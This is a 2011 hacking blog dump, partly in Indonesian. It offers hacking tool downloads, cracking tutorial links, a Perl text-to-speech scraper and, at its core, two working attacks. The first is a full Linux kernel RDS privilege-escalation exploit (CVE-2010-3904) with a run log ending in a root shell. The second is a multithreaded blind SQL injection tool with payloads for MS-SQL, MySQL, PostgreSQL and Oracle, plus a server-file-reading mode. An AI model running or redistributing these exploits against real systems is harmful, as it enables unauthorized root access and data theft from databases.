Sabtu, 29 Januari 2011

Google Hack Application


Simple Google hack application
Download

Hackerfox => Mozilla Firefox for hackers


Portable Mozilla Firefox for hackers
Download

Tutorial Reverse Engineering

Cuman sekedar share ajah ^_^
Tutorial ini dibagi menjadi 40 bagian, di mana pada setiap bagian akan dijelaskan secara gamblang ^_^ step by step cara melakukan cracking dengan menggunakan OllyDbg dengan berbagai contoh kasus yang berbeda ^_^

Video 1
Video 2
Video 3
Video 4
Video 5
Video 6
Video 7
Video 8
Video 9
Video 10
Video 11
Video 12
Video 13
Video 14
Video 15
Video 16
Video 17
Video 18
Video 19
Video 20
Video 21
Video 22
Video 23
Video 24
Video 25
Video 26
Video 27
Video 28
Video 29
Video 30
Video 31
Video 32
Video 33
Video 34
Video 35
Video 36
Video 37
Video 38
Video 39
Video 40


Selamat Mencoba ^_^

From Text to Speech (Voice) voice.pl

 
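#!/usr/bin/perl
# voice.pl - drive the Cepstral web demo form from the command line:
#   -E / -V                scrape the demo page and list effect / voice names
#   -i TEXT -o FILE        submit TEXT through the demo form and save the WAV
#   [-e effect] [-p pitch] [-r rate] [-v voice]   optional form fields
# Every HTTP failure is fatal, so nothing is left half-written on error.

use strict;
use warnings;
use LWP::UserAgent;
use HTML::Form;
use Getopt::Std;

print "Text-to-Speech Nabber by sToRm \n";

my $ua = LWP::UserAgent->new();
my %opts;

getopts('EVe:i:o:p:r:v:', \%opts);

# Fetch the demo page (shared by -E and -V) and return its lines.
# Dies with the HTTP status line when the request is not successful.
sub _demo_page_lines {
    my $response = $ua->get('http://cepstral.com/demos/');
    die 'Error: ' . $response->status_line() . "\n" unless $response->is_success();
    return split /\n/, $response->content();
}

if ( defined $opts{'E'} ) {
    print "Available effects:\n";
    for my $line ( _demo_page_lines() ) {
        # NOTE(review): the pattern on this line did not survive transcription
        # and reads as an empty match. In Perl an empty pattern re-uses the
        # last successfully matched pattern, so $1 is never set here and each
        # line prints as "  .sfx" with a warning. Restore the real pattern
        # before relying on this listing.
        print "  $1.sfx\n" if $line =~ //;
    }
    exit(0);
}

if ( defined $opts{'V'} ) {
    print "Available voices:\n";
    for my $line ( _demo_page_lines() ) {
        print "  $1\n" if $line =~ /if \(voice=='(.+)'\) {/;
    }
    exit(0);
}

if ( defined $opts{'i'} and defined $opts{'o'} ) {
    print "Sending initial request.\n";

    my $response = $ua->get('http://demos.cepstral.com/cepstral/demos/demo.cgi/cepstral.wav');
    die 'Error: ' . $response->status_line() . "\n" unless $response->is_success();

    # scalar context: HTML::Form->parse returns the first form on the page
    my $form = HTML::Form->parse($response);
    print "Success - Applying settings.\n";

    $form->value('content', $opts{'i'});

    # Optional tuning fields, each applied only when its switch was given
    # (the original used void-context ternaries for this).
    my %field_for_opt = ( e => 'effect', p => 'pitch', r => 'rate', v => 'voice' );
    for my $opt ( sort keys %field_for_opt ) {
        $form->value( $field_for_opt{$opt}, $opts{$opt} ) if defined $opts{$opt};
    }

    print "Fetching audio file.\n";

    # The second argument makes LWP write the response body straight to the
    # output file; the status is checked so a failed download is reported
    # instead of silently leaving an empty or partial file behind.
    my $audio = $ua->request($form->click(), $opts{'o'});
    die 'Error: ' . $audio->status_line() . "\n" unless $audio->is_success();

    exit(0);
}

print "Usage: perl $0 -i \"Your phrase here\" -o outfile.wav [-EVeprv]\n";
print "    -E  List available effects\n";
print "    -V  List available voices\n";
print "    -e  Select a voice effect (default: None)\n";
print "    -i  Define the input string\n";
print "    -o  Define the outfile\n";
print "    -p  Change the pitch of speech (1-76, default: 1)\n";
print "    -r  Change the rate of speech (1-3400, default: 170)\n";
print "    -v  Select a voice to use (default: David)\n";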

Jumat, 28 Januari 2011

Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit

Code :
/*
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * and overwrites a function pointer (rds_ioctl) to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RECVPORT 5555
#define SENDPORT 6666

/*
 * Open a PF_RDS SOCK_SEQPACKET socket and bind it to 127.0.0.1:<port>.
 * Exits the process with -1 if socket() or bind() fails; returns the
 * descriptor otherwise.  Defensive note: an unprivileged process creating
 * an RDS socket on a host that does not use RDS is a useful audit signal,
 * and preventing autoload of unused protocol families (as the header
 * comment above recommends) removes this attack surface altogether.
 */
int prep_sock(int port)
{
   
    int s, ret;
    struct sockaddr_in addr;

    s = socket(PF_RDS, SOCK_SEQPACKET, 0);

    if(s < 0) {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }
   
    memset(&addr, 0, sizeof(addr));

    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);

    ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

    if(ret < 0) {
        printf("[*] Could not bind socket.\n");
        exit(-1);
    }

    return s;

}

/*
 * Receive side of the write primitive: asks the kernel to deliver the next
 * RDS datagram (sizeof(void *) bytes) to <address>, which write_to_mem()
 * sets to a kernel address.  The missing user-pointer check in the RDS
 * receive path described in the header comment is what lets the copy land
 * in kernel memory; the upstream fix added that access check.  The result
 * of recvfrom() is not checked.
 */
void get_message(unsigned long address, int sock)
{

    recvfrom(sock, (void *)address, sizeof(void *), 0,
         NULL, NULL);

}

/*
 * Send side of the write primitive: sends <value> as a single
 * sizeof(unsigned long) RDS datagram to 127.0.0.1:RECVPORT, where the
 * recvfrom() in get_message() is waiting on the other socket.  Exits with
 * -1 if sendmsg() fails.  <size> is assigned but never used.
 */
void send_message(unsigned long value, int sock)
{
   
    int size, ret;
    struct sockaddr_in recvaddr;
    struct msghdr msg;
    struct iovec iov;
    unsigned long buf;
   
    memset(&recvaddr, 0, sizeof(recvaddr));

    size = sizeof(recvaddr);

    recvaddr.sin_port = htons(RECVPORT);
    recvaddr.sin_family = AF_INET;
    recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

    memset(&msg, 0, sizeof(msg));
   
    msg.msg_name = &recvaddr;
    msg.msg_namelen = sizeof(recvaddr);
    msg.msg_iovlen = 1;
   
    /* one iovec carrying the value to be written on the receiving side */
    buf = value;

    iov.iov_len = sizeof(buf);
    iov.iov_base = &buf;

    msg.msg_iov = &iov;

    ret = sendmsg(sock, &msg, 0);
    if(ret < 0) {
        printf("[*] Something went wrong sending.\n");
        exit(-1);
    }
}

/*
 * Write <value> to kernel address <addr>.  The child sleeps one second and
 * then sends the value on <sendsock>; the parent meanwhile blocks in
 * get_message() on <recvsock> with <addr> as the destination buffer, then
 * reaps the child.  The sleep is the only ordering between the two halves.
 * NOTE(review): a failed fork() (-1) is not checked; it appears to take the
 * parent branch and wait for a child that does not exist.
 */
void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

    if(!fork()) {
            sleep(1);
            send_message(value, sendsock);
            exit(1);
    }
    else {
        get_message(addr, recvsock);
        wait(NULL);
    }

}

/*
 * Signatures of the two kernel functions the payload calls, with the
 * regparm(3) attribute (an x86-32 convention: the first three arguments are
 * passed in registers, as in kernels built with -mregparm=3).  Both pointers
 * are filled in by main() from get_kernel_sym() before getroot() runs.
 */
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

/*
 * Payload installed in place of rds_ioctl (see main()) and therefore run in
 * kernel context when main() issues its ioctl(): gives the calling task
 * root credentials via commit_creds(prepare_kernel_cred(0)) and returns -1
 * to the ioctl caller.  The two parameters are unused.
 */
int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

    commit_creds(prepare_kernel_cred(0));
    return -1;   

}

/* thanks spender... */
/*
 * Resolve kernel symbol <name> to its address.  Sources, in order:
 *   /proc/kallsyms                    "%p %c %s" lines
 *   /proc/ksyms                       old two-column "%p %s" lines, with
 *                                     module/"smp" decorations stripped
 *   /boot/System.map-<uname release>  the "fallback" label; rep is set so
 *                                     the hit is tagged "(via System.map)"
 * Prints and returns the address on a hit, 0 when the symbol is nowhere.
 * Defensive note: kptr_restrict (zeroed addresses in /proc/kallsyms for
 * unprivileged readers) and a System.map that is not world-readable are
 * the controls that frustrate this resolution step.
 * NOTE(review): the "%s" conversions write into sname[512] with no width
 * limit; the System.map path is built with an unchecked sprintf, but the
 * release string is bounded by struct utsname so that one fits.
 */
unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;         /* 1 while scanning System.map */
    int oldstyle = 0;    /* 1 for the two-column /proc/ksyms format */

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while(ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                /* skip entries carrying module bookkeeping markers */
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                /* cut a trailing "smp"-style suffix, and the underscores
                   before it, so the bare name compares equal below */
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            /* the address did not parse: consume one token and carry on */
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    if (rep)
        return 0;
fallback:
    /* didn't find the symbol, let's retry with the System.map
       dedicated to the pointlessness of Russell Coker's SELinux
       test machine (why does he keep upgrading the kernel if
       "all necessary security can be provided by SE Linux"?)
    */
    uname(&ver);
    /* anything that is not a 2.6 kernel is read in the old map format */
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

/*
 * Entry point.  Refuses to run unless uname() reports a "2.6.3x" release,
 * opens the send and receive RDS sockets, resolves rds_proto_ops,
 * rds_ioctl, commit_creds and prepare_kernel_cred, then uses the write
 * primitive to replace the rds_ioctl slot of rds_proto_ops (hard-coded as
 * the tenth pointer in the structure, see the header comment) with
 * getroot(), triggers it with an ioctl() on the send socket, restores the
 * original pointer and, if getuid() is now 0, execs /bin/sh.  Returns -1
 * on every failure path and falls off the end if execl() fails.
 * Defensive note: the run leaves host-level traces -- an RDS socket from
 * an unprivileged user, reads of /proc/kallsyms or /boot/System.map, and
 * a uid change without setuid/sudo -- that audit tooling can alert on.
 */
int main(int argc, char * argv[])
{
    unsigned long sock_ops, rds_ioctl, target;
    int sendsock, recvsock;
    struct utsname ver;

    printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
    printf("[*] by Dan Rosenberg\n");

    uname(&ver);

    /* prefix check only: "2.6.3" also matches 2.6.30 .. 2.6.39 */
    if(strncmp(ver.release, "2.6.3", 5)) {
        printf("[*] Your kernel is not vulnerable.\n");
        return -1;
    }   
   
    sendsock = prep_sock(SENDPORT);
    recvsock = prep_sock(RECVPORT);

    /* Resolve addresses of relevant symbols */
    printf("[*] Resolving kernel addresses...\n");
    sock_ops = get_kernel_sym("rds_proto_ops");
    rds_ioctl = get_kernel_sym("rds_ioctl");
    commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

    if(!sock_ops || !rds_ioctl || !commit_creds || !prepare_kernel_cred) {
        printf("[*] Failed to resolve kernel symbols.\n");
        return -1;
    }

    /* Calculate target */
    target = sock_ops + 9 * sizeof(void *);

    /* Overwrite rds_ioctl function pointer */
    printf("[*] Overwriting function pointer...\n");
    write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);

    /* Trigger the payload */
    printf("[*] Triggering payload...\n");
    ioctl(sendsock, 0, NULL);

    /* Restore the rds_ioctl function pointer */
    printf("[*] Restoring function pointer...\n");
    write_to_mem(target, rds_ioctl, sendsock, recvsock);

    if(getuid()) {
        printf("[*] Exploit failed to get root.\n");
        return -1;
    }

    printf("[*] Got root!\n");
    execl("/bin/sh", "sh", NULL);

}
Tested :
[email protected]:~/Documents$ uname -a
Linux deadc0de-team 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux
[email protected]:~/Documents$ gcc linux-rds-exploit.c -o linux-rds-exploit
[email protected]:~/Documents$ chmod +x linux-rds-exploit
[email protected]:~/Documents$ ./linux-rds-exploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xf8491980
 [+] Resolved rds_ioctl to 0xf8479090
 [+] Resolved commit_creds to 0xc01626b0
 [+] Resolved prepare_kernel_cred to 0xc01628b0
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root)
# pwd
/home/d4wfl1n/Documents
# uname -a
Linux deadc0de-team 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux
#

Rabu, 26 Januari 2011

Deadc0de Blind SQL Injection <= to my honey JID :p

I call this hacker_is_death.pl lol hahahahha
this is a simple c0de to try blind SQL Injection and test whether the target web application is vulnerable :)

dedicated to "Syarifah Sarah Soraya Anajani Haniah Alkaaff" a.k.a "DJ Cleo"
keep playing the music honey :)

#!/usr/bin/env perl
# Blind SQL Injection
# Author : D4wFl1N
# thx to : r3d3 deadc0de, black deadc0de, mozart deadc0de, jimmy deadc0de a.k.a jimmy romanticdevil
# and y0u
# TODO:
# [ ] Rip more c0de from others.
#  ______      _____ _             ___          
# |  ____|    / ____| |           / _ \         
# | |__ _   _| |    | | __  _   _| | | |_   _   
# |  __| | | | |    | |/ / | | | | | | | | | |  
# | |  | |_| | |____|   <  | |_| | |_| | |_| |  
# |_|   \__,_|\_____|_|\_\  \__, |\___/ \__,_|  
#                           __/ |              
#                          |___/                
#

use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
use threads;
use threads::shared;
use Time::HiRes qw( usleep);

$| = 1;


###############################################################################
# Defaults for the command-line options parsed below.
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.0";
my $default_useragent = "deadc0de $version";
# Expression extracted when no -sql is given.
my $default_sql = "(select \@\@version)";
###############################################################################


$| = 1;    # autoflush (already set above)

# File-scope state shared by the subs below:
#   $solution              characters recovered so far ("success" after -get)
#   %vars / @varsb         query arguments of the URL, by name / in URL order
#   $lastvar / $lastval    the argument the payload is appended to
#   $scheme .. $fragment   URL parts filled in by parseurl()
#   $head / $tail          interpolated into every payload but not assigned
#                          anywhere in the visible file (only the commented
#                          lines in the match probe below), so they read as ""
#   $high                  highest bit mask tested per character (getbyte)
#   $hits                  request counter, incremented inside worker threads
#   $amatch                "1" when the -match string was guessed
#   $ua / $furl            LWP user agent and the URL of the current request
#   $args / $req           declared but not used in the visible file
my ($args, $solution);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my ($head, $tail, $high);
my $hits = 0;
my $amatch = 0;
my ($ua,$req);
my $furl;

###############################################################################
# Define GetOpt:
my ($url, $type, $database, $sql, $time, $rtime, $match, $uagent, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($start, $length, $method, $cookie, $blind);
my ($help, $get);
my ($ascii, $binary);

# -database: 0 MS-SQL, 1 MySQL, 2 PostgreSQL, 3 Oracle; -type: 0 plain
# boolean AND, 1 CASE form (see launch_thread). -binary is parsed but not
# used anywhere in the visible file.
my $options = GetOptions (
  'help!'            => \$help,
  'url=s'            => \$url,
  'database=s'         => \$database,
  'type=s'             => \$type,   
  'get=s'            => \$get,
  'sql=s'            => \$sql,
  'blind=s'          => \$blind,
  'match=s'          => \$match,
  'start=s'          => \$start,
  'length=s'         => \$length,
  'method=s'         => \$method,
  'uagent=s'         => \$uagent,
  'ruagent=s'         => \$ruagent,
  'cookie=s'         => \$cookie,
  'proxy=s'          => \$proxy,
  'proxy_user=s'     => \$proxy_user,
  'proxy_pass=s'     => \$proxy_pass,
  'rproxy=s'         => \$rproxy,
  'debug!'           => \$debug,
  'binary!'           =>\$binary,
  'ascii!'           => \$ascii,
  'rtime=s'          => \$rtime,
  'time=i'           => \$time
  );

# help() is defined at the end of the file.
&help unless ($url);
&help if $help eq 1;   # string comparison; $help is undef unless -help is given

#########################################################################
# Default Options.
$uagent         ||= $default_useragent;
$debug          ||= $default_debug;
$length         ||= $default_length;
$solution       ||= $start;    # the recovered string is seeded with -start
$method         ||= $default_method;
$sql            ||= $default_sql;
$time           ||= $default_time;


&createlwp();
&parseurl();

# Injection point: the last URL argument unless -blind names one.
if ( ! defined($blind)) {
        $lastvar = $varsb[$#varsb];
        $lastval = $vars{$lastvar};
} else {
        $lastvar = $blind;
        $lastval = $vars{$blind};
}

if (! defined($type)) {
    $type=0;
}

if (! defined($database)) {
    $database=0
}

if (defined($cookie)) { &cookie() }
# Without -match, look for a response line that distinguishes a true from a
# false condition: first " AND 1=1" vs " AND 1=0", then the single-quote
# variant (fmatch). Defensive note: two requests differing only by such a
# trailing boolean on one parameter are the classic boolean-based injection
# fingerprint worth alerting on.
if (!$match) {
    print "\nTrying to find a match string...\n" if $debug == 1;
    $amatch = "1";
    $match = fmatch("$url"," AND 1=");
    if ($match eq "no vulnerable")
        {
        print "\nNo vuln: 2nd..\n" if $debug ==1;
        $match = fmatch("$url"," AND 1='");
        #$head = "\"";
        #$tail = " AND 1=\"1";
    };
    if ($match eq "no vulnerable") {
        print "Not vulnerable \n\n If you know its vulnerable supply the '-match' string\n";
        exit 0;
    }
}
&banner();
&httpintro();



# -get reads a server file through load_file() (fileget); otherwise the -sql
# expression is extracted (sqlget). Ternary in void context. The sub bodies
# that follow are skipped at run time; execution resumes at &result() below.
( ! $get) ? sqlget() : fileget();

# Shared between getbyte() and its worker threads: one recovered bit per
# slot, and the number of workers that have reported.
my @byte = ();
my $wait_me;

# Recover one character of the SQL expression $_[0]: start one detached
# worker thread per bit mask (1, 2, 4, .. $high; eight threads normally,
# seven with -ascii where the top slot is preset to 0), each storing its
# result into the shared @byte slot $c (counting down from 8), then spin in
# 50-microsecond steps until the shared counter $wait_me shows that every
# worker has reported. Returns the character packed from the bit string.
# Defensive note: every character costs a burst of eight near-simultaneous
# requests to the same parameter - a clear rate/pattern signal for WAF and
# access-log monitoring.
# NOTE(review): with -ascii only seven workers run but the loop still waits
# for eight reports ($wait_me <= 7); whether it terminates depends on
# something else bumping the counter - confirm. share() is re-applied to
# both variables on every call; check threads::shared for what that does to
# an already-shared @byte. $i is never incremented, so @thread_count only
# ever holds the most recent thread.
sub getbyte {
   my $sql = $_[0];
   my $bit="";
   my @thread_count = ();
   my $c = 8;    # @byte slot for the next worker: 8 for bit 1 .. 1 for bit 128
   my $i = 0;
   $high = 128 unless $ascii;
   $wait_me = 0;

   share($wait_me);
   share (@byte);

   if ($ascii) {
     $byte[0] = 0;
     $high = 64;
   }
   for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
    $thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
    $thread_count[$i]->detach;
    $c--;
   }

   while ($wait_me <= 7) {
    usleep(50);
    #sleep(1);# if !$dontsleep;
   }

   # slot 0 first: join() renders unset slots as "", so pack sees 8 bits
   my $str = join("",@byte);
   #print "\nSTR: $str\n";
   return pack("B*","$str");

}

# Worker body for one bit of one character (started detached by getbyte).
# Args: ($sql, $bit, $c) - the SQL expression yielding one character, the
# bit mask to test, and the slot of the shared @byte to fill. Builds the
# boolean payload $val for the selected -database (0 MS-SQL, 1 MySQL,
# 2 PostgreSQL, 3 Oracle) and -type (0 plain AND, 1 CASE form whose false
# branch forces an error), using the "-- " terminated variant when the URL
# ends with a single quote. The payload is appended to the last argument's
# value (in the URL for GET, in %vars for POST), the page is fetched, and
# $byte[$c] becomes 0 when $match appears in the response, 1 otherwise.
# Finally the shared $wait_me counter is incremented so getbyte can finish.
# Globals read: $method, $database, $type, $url, $head, $tail, $lastvar,
# $lastval, $match, $rproxy, $ruagent.
# Defensive note: the constructs used here - ASCII()/ord()/BITAND() combined
# with a bit mask, "1/0" or information_schema subselects inside CASE, and
# the "-- " terminator in a query argument - are dependable WAF and log
# signatures; the root mitigation is parameterised queries on the server.
# NOTE(review): a -database value outside 0..3 leaves $val undefined and
# the request goes out unmodified. $lastval is interpolated into the s///
# pattern unescaped. $hits++ runs inside the worker; under ithreads
# non-shared variables are copied per thread, so presumably the main
# thread's $hits never changes - confirm.
sub launch_thread {
    my ($sql, $bit, $c) = @_;
    my $val;   
    # GET payloads travel in the query string, so "&" is sent as %26
    my $and="%26";
     if (lc($method) eq "post"){
     $and="&";
     }
     ###------------MS-SQL BLOCK STARTS HERE---------------------###

if ($database==0) {


#print "I am here";
        if ($url =~ /'$/) {
      ##   $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
 if ($type==1)
                      {
                         $val = "$head and (select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (select case when ((ASCII($sql) $and $bit) =0)then 1 else 1/0 end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
                      }
                   } 
              
                  }


                }


     ###------------MS-SQL BLOCK STOPS HERE---------------------###
     ###----------POSTGRES BLOCK STARTS HERE---------------------###

if ($database==2) {



        if ($url =~ /'$/) {
   
 if ($type==1)
   
                      {
                         $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1-- $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
                      }
                   } 
              
                  }


                }
###----------POSTGRES BLOCK STOPS HERE---------------------###
###----------ORACLE BLOCK STARTS---------------------------####
     if ($database==3) {
   
if ($url =~ /'$/) {
          if ($type==1)
   
                      {
                         $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1-- $tail";
                      }
              else {    if($type==0)
                      {      
                         $val = "$head and BITAND((ASCII($sql)), $bit)=0-- $tail";                      }
                   } 

    }
                    else{
                       if ($type==1)
                      {
                         $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
                      }
              else {    if($type==0)
                      {      
               # same CASE payload as type==1 above, unlike the quoted branch
               $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
                      }
                   } 
              
                  }
                        }


###----------ORACLE BLOCK STOPS HERE---------------------------####
###------------MY-SQL BLOCK STARTS HERE---------------------###

   
    if ($database==1) {
   
   
    if ($url =~ /'$/)        {
          if ($type==1)
                      {
                         $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
                      }
              else {    if($type==0)
                      {      
              $val = "$head and (ord($sql) $and $bit)=0 $tail";
                      }
                   } 
# or one may also use #
                            }
             
                  else
                   
                {
                      if ($type==1)
                      {
                         $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
                      }
              else {if($type==0)
                      {      
              $val = "$head and (ord($sql) $and $bit)=0 $tail";
                      }
                    } 
               

                }
###-----------MySQL BLOCK ENDS HERE-------------------###




 }
                  #print "VAL[$c] $val\n";
        # POST: the payload rides in the form data that fetch() posts
        if (lc($method) eq "post") {
                $vars{$lastvar} = $lastval . $val;

        }
        # GET: append the payload right after "$lastvar=$lastval" in the URL
        $furl = $url;
        $furl =~ s/($lastvar=$lastval)/$1$val/;
        &createlwp if $rproxy || $ruagent;
        my $html=fetch("$furl");
        $hits++;
        # the lock is scoped to one loop iteration and released at its end
        foreach (split(/\n/,$html)) {
        lock @byte;
                if (/\Q$match\E/) {
                    $byte[$c]=0;
                    last;
                 } else { $byte[$c] = 1; }
        }
    lock $wait_me;
    threads->yield();
    $wait_me++;
}

# Extract the value of the global -sql expression one character at a time
# for the selected -database dialect. Each dialect block runs the same three
# steps: 1) getbyte() on the "length of the length" gives the number of
# digits in the result length; 2) one getbyte() per digit builds $fsize, the
# result length; 3) one getbyte() per position from $start+1 to $fsize+1
# appends the character to $solution and echoes it. $length is set to
# "<n>bytes" for the bsqlintro() banner printed before step 3. With eight
# requests per character (see getbyte) the total is roughly
# 8 * (digits + length) requests against one parameter.
# NOTE(review): the position loop runs to $fsize+1, one past the end; the
# substring call for that position presumably yields an empty string -
# confirm. "my $lng .= getbyte($s)" is plain initialisation (nothing to
# append to on a fresh variable). Only the Oracle and PostgreSQL blocks
# print FSIZE.
sub sqlget                                    {


    ##--ms-sqlblock--##




if ($database==0 ) {

my ($fsize,$i,$s);
        $s = "SUBSTRING(cast(len(len(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTRING(cast(len(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substring(cast(($sql)as varchar),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }


}

    ##--ms-sql block-finish--##
    ##---oracle block starts--##
if ($database==3) {

    my ($fsize,$i,$s);
        $s = "SUBSTR(cast(length(length(($sql)))as varchar(100)),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar(100)),$i,1)";
        $fsize.=getbyte($s);
    }

    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "substr(cast(($sql)as varchar(100)),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }
}


    ##---oracle block finish--##
##--postgres block----##
if ($database==2) {
my ($fsize,$i,$s);
   
        $s = "SUBSTR(cast(length(length(($sql)))as varchar),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "SUBSTR(cast(length(($sql))as varchar),$i,1)";
        $fsize.=getbyte($s);
    }

    print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
       
        $s = "substr(cast(($sql)as varchar),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }


}

    ##--postgres block-finish--##
    ##-mysql block--##
    if ($database==1) {
        my ($fsize,$i,$s);
        $s = "mid(length(length(($sql))),1,1)";
    my $lng .= getbyte($s);
    for ($i=1;$i<=$lng;$i++) {
        $s = "mid(length(($sql)),$i,1)";
        $fsize.=getbyte($s);
    }
   
    #print "FSIZE: $fsize\n";
    $length = $fsize. "bytes";
    &bsqlintro();

    my $rsize = $start + 1;
    for ($i=$rsize;$i<=$fsize+1;$i++) {
        $s = "mid(($sql),$i,1)";
        #print "S: $s\n";
        my $byte = getbyte($s);
        $solution .= $byte;
        print $byte;
     }
}

##-mysql-block-##
                                        }

#---------------end-------------------#
# -get mode (MySQL only): read a server-side file through load_file() one
# character at a time and append it to a local file named after the last
# path component of -get. The path is passed to MySQL as a 0x.. hex literal,
# or as a double-quoted string when it contains a backslash. An existing
# local file stops the run unless -start is given (its size is printed as
# the resume offset). Then: the digits of the file length, the length, and
# each character from $start+1 to length+1, written through the bareword
# handle FILE (2-arg ">>" open, unchecked). $solution is set to "success"
# and $sql to the path for the final report.
# Defensive note: load_file() requires the FILE privilege and honours
